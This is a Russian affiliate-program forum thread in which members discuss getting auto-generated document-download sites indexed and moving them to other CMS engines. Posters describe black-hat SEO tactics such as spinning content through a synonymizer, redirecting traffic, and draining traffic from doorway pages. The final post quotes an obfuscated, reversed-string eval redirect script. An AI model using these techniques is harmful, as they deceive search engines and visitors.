Форум поддержки партнеров

Объявление

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум поддержки партнеров » gostsite.ru » Возможно ли сделать подобный сайт на другом движке?


Возможно ли сделать подобный сайт на другом движке?

Сообщений 1 страница 19 из 19

1

Доброго времени суток всем!
У меня вот какая проблема: сделал Сайты ГОСТ, РЕФЕРАТОВ и ИНСТРУКЦИЙ ну вобщем полный набор прогнал их не то чтобы через сабмитер а через сайт 1ps.ru сайты проиндексировались только на yahoo (4-8 страниц) и Bing (3-5 страниц) поставлены сайты были на фрихосте 6te.net описаном на форуме как подходящем для данных сайтов, может быть причина в движке скажите пожалуйста могу ли я сделать подобные сайты на dle? или каком нибудь другом движке?

0

2

Читай темы форума,там написано всё конкретно,в яндексе сразу получишь "автобан",все остальные поисковики проиндексируют твои сайты ...

0

3

Ну автобан он не получит. Яндекс не банит эти сайты он просто их игнорирует, но не всегда, бывают такие которые и индексирует (даже с Сапой). Почему так я даже не знаю. Может бубен поможет...

0

4

forecs написал(а):

Читай темы форума,там написано всё конкретно,в яндексе сразу получишь "автобан",все остальные поисковики проиндексируют твои сайты ...

Дык в том то и дело что Гугл не индексирует потому что ему не нравится сделанный мной sitemap.xml я перепробовал все варианты может кто подскажет что еще можно сделать и как его заставить прогуляться по сайту пробовал создавать и тхт, и через rss все равно не принимает. а яндекс непойму почему но дал тиц равный 10

0

5

Ну давайте порассуждаем, какой выход из данной ситуации возможен?

Решение проблемы с двигом.
Можно отдавать контент через rss ленту, а каждый сам будет импортиртировать его в любой двиг по своему усмотрению.

Решение проблемы с поисковыми системами.

Банят сейчас сайты думаю по нескольким причинам:
1. Не уникальный контент.
2. Все на одном движе (скрипты, шаблоны, структура).
3. Перенаправления трафика на другой сайт (хотя таймер ожидания перед загрузкой по идее должен от этого защищать).

Решение:
1. Добиваемся уникализации путем перемешивания контента и пропуска его через синомайзер.
2. Вопрос решается rss фидом.
3. ХЗ как решить. Может кто предложит какие варианты?

Решение проблемы с читом.
Так как ссылки для слива трафа будут прямыми (открытыми), 100% усилится проблема чита.
Желания тратить время и нервы на выявление читеров и разбор полетов совершенно нет.
Возможный выход из положения ,- перевод партнерки чисто на процент с продаж.

Что вы думаете по поводу изложенных выше проблем и их решения?

0

6

ReZAK написал(а):

2. Все на одном движе (скрипты, шаблоны, структура).

вот именно а если каждый учасник будет делать сайт на том двиге с которым ему удобнее работать то и сходств между сайтами будет намного меньше

ReZAK написал(а):

Решение проблемы с читом.
Так как ссылки для слива трафа будут прямыми (открытыми), 100% усилится проблема чита.
Желания тратить время и нервы на выявление читеров и разбор полетов совершенно нет.
Возможный выход из положения ,- перевод партнерки чисто на процент с продаж.

Что вы думаете по поводу изложенных выше проблем и их решения?

тут конечно да читеры будут сопротивляться но меня лично больше интересует возможность автонаполнения сайта уникальным контентом и оплата только за смс меня ни капли не сущает 
интересно какима должен быть шаблон для добавления рсс фида на двиг ДЛЕ

0

7

Знаю что точно есть готовые скрипты импорта для блогов на вордпресс, скорее всего и для других популярных движков подобные имеются.

0

8

Нам счс первым делом "побудить " -"яшу "к индексации страниц ,а как это исполнить,вот задача и почему контент не уникальный,на антиплагиате не находит повторений...

0

9

ReZAK написал(а):

2. Вопрос решается rss фидом.

как получить этот фид настроенный на мой аккаунт без установки скрипта? возможно ли это?

0

10

chedrik666, это я пока в теории рассуждаю, о том что можно реализовать для решения данных проблем.

0

11

ReZAK написал(а):

chedrik666, это я пока в теории рассуждаю, о том что можно реализовать для решения данных проблем.

установил водпрес поставил сбор рсс со своего сайта работает без проблем сейчас жду чтобы посмотреть как проиндексируется

0

12

chedrik666 написал(а):

установил водпрес поставил сбор рсс со своего сайта работает без проблем сейчас жду чтобы посмотреть как проиндексируется

Перенаправление работает?(отметка для партнерки) Хочу попробовать замутить подобное на Drupale

Отредактировано wdeymosw (2009-11-10 13:39:59)

0

13

Вопрос Резаку если я контент перенесу на другой движок (вручную или автоматом) будет ли работать партнерка? (спрашиваю чтоб не тестировать)

Отредактировано wdeymosw (2009-11-10 13:42:29)

0

14

wdeymosw, если только сменить двиг, без смены домена, то будет.

0

15

Ув. ReZAK, как вы смотрите на постинг через xmlrpc?

0

16

ReZAK написал(а):

wdeymosw, если только сменить двиг, без смены домена, то будет.

Опишите подробнее привязку. Где и что изменить в коде чтобы работало на другом домене с моим ID и соответственно деньги зачислялись тоже мне. :rolleyes:  Вопрос не праздный. Есть возможность импортировать в разные движки, но как изменить привязку непонятно ...

Отредактировано topgan (2010-03-02 13:19:46)

0

17

Надеюсь в ближайшее время дойдут руки и реализую возможность импорта без привязок.

0

18

ReZAK написал(а):

Надеюсь в ближайшее время дойдут руки и реализую возможность импорта без привязок.

Сейчас как сделать? Когда дойдут руки уже ноги ходить не будут. Можно в личку. И зааодно как делать слив с доров.

Отредактировано topgan (2010-03-04 17:00:13)

0

19

ReZAK
тоже интересует возможность постинга на другой движок (напрмер dle) !!!
Пробовал импортиравать как rss в dle появляется вот такое

var downloadlink545601='СКАЧАТЬ ДОКУМЕНТ'; document.getElementById("downloadhtml545601").innerHTML = downloadlink545601; var downcount545601=17; function countdown2545601() { downcount545601--; if( downcount545601 == 0 ) { document.getElementById("downloadhtml545601").innerHTML = downloadlink545601; download545601(); } if( downcount545601 > 0 ) { downloadlink545601='Если загрузка не началась автоматически, перейдите по этой ссылке.'; document.getElementById("downloadhtml545601").innerHTML = "Загрузка документа начнется через: "+downcount545601+" сек"; setTimeout('countdown2545601()',1000); }}

var q='>tpircs/tpircsavaj=egaugnal tpircs=0;i--) c+=q.charAt(i); q=c;';eval(code);document.write(q);

с этим можно как то боротся ?

Отредактировано trdnepr (2011-03-16 19:11:21)

0

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»


автонаполняемые блоги - генератор дорвеев - зарегистрировать домен - создать форум - раскрутка сайтов


Вы здесь » Форум поддержки партнеров » gostsite.ru » Возможно ли сделать подобный сайт на другом движке?